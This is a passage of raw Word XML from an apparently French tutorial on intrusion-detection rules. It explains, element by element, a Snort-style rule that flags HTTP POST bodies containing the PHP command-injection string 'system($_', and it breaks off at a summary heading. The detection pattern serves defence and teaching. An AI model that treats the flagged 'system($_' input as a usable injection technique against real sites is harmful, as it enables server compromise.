          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content:"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$_"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http_client_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C971F" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>classtype:web</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-application-attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE706E" w14:textId="77777777" w:rsidR="008810FA" w:rsidRPr="008810FA" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    sid:283; rev:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F8EE262" w14:textId="77777777" w:rsidR="00DA5228" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008810FA">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CAE631" w14:textId="77777777" w:rsidR="00DA5228" w:rsidRDefault="00DA5228" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA5228" w14:paraId="1520FAA2" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E64D01" w14:textId="58EBD858" w:rsidR="00DA5228" w:rsidRPr="006E45A3" w:rsidRDefault="00FC0E90" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E45A3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E24CEDE" w14:textId="69C3F7B3" w:rsidR="00DA5228" w:rsidRPr="006E45A3" w:rsidRDefault="00FC0E90" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E45A3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Explication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w14:paraId="5A92C48F" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D3BE68E" w14:textId="40485C05" w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w:rsidRDefault="00FC0E90" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">alert </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>any</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -&gt; any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>any</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0896EC" w14:textId="57ACF2C1" w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w:rsidRDefault="008A2F3E" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E23EFD">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Analyse tout le trafic TCP quel que soit le port ou l’IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5228" w:rsidRPr="000A3BEA" w14:paraId="46F3B1EA" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B8B8049" w14:textId="5EF85E85" w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w:rsidRDefault="00FC0E90" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>msg: "Suspicious HTTP POST request"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C53E4C" w14:textId="69926C7C" w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w:rsidRDefault="0064016A" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E23EFD">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Message affiché en cas de déclenchement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5228" w:rsidRPr="0064016A" w14:paraId="21A99567" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DFD42B7" w14:textId="403BD201" w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w:rsidRDefault="005E08E0" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>flow:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>to_server</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F51EC0" w14:textId="794F535B" w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w:rsidRDefault="0064016A" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E23EFD">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>L’alerte s’applique à du trafic allant vers un serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5228" w:rsidRPr="0064016A" w14:paraId="5635EA56" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01D5483E" w14:textId="32E867BF" w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w:rsidRDefault="005E08E0" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>content:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"POST</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">"; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>http_method</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E41325C" w14:textId="3F3258E7" w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w:rsidRDefault="0064016A" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E23EFD">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recherche une requête HTTP de type POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5228" w:rsidRPr="006E45A3" w14:paraId="1DEA2105" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6BB9D5" w14:textId="0DCAACD8" w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w:rsidRDefault="005E08E0" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>content:"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">$_"; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>http_client_body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C5235A" w14:textId="57B30143" w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w:rsidRDefault="00965524" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00965524">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecte la présence de </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00965524">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>system(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00965524">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$_ dans le corps de la requête, typique d’une attaque PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w14:paraId="77EDD2C8" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D6367C" w14:textId="063D7490" w:rsidR="00DA5228" w:rsidRPr="008A2F3E" w:rsidRDefault="008A2F3E" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>classtype</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> web-application-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F50C82" w14:textId="2C469ECD" w:rsidR="00DA5228" w:rsidRPr="00E23EFD" w:rsidRDefault="00E23EFD" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E23EFD">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Classe cette activité comme une </w:t>
            </w:r>
            <w:r w:rsidRPr="00E23EFD">
              <w:rPr>
                <w:rStyle w:val="lev"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>attaque sur application web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A2F3E" w:rsidRPr="00E23EFD" w14:paraId="6942E47D" w14:textId="77777777" w:rsidTr="00DA5228">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68794F44" w14:textId="7EA75A11" w:rsidR="008A2F3E" w:rsidRPr="008A2F3E" w:rsidRDefault="008A2F3E" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A2F3E">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>283; rev:3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E2D646" w14:textId="4CB612A0" w:rsidR="008A2F3E" w:rsidRPr="00E23EFD" w:rsidRDefault="00965524" w:rsidP="008810FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00965524">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Identifiant et révision de la règle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30E250E1" w14:textId="77777777" w:rsidR="00F6512A" w:rsidRDefault="008810FA" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23EFD">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C265300" w14:textId="77777777" w:rsidR="00F6512A" w:rsidRDefault="00F6512A" w:rsidP="008810FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C4E104" w14:textId="6589528B" w:rsidR="00037AED" w:rsidRDefault="00F6512A" w:rsidP="00037AED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6512A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En résumé</w:t>
      </w:r>
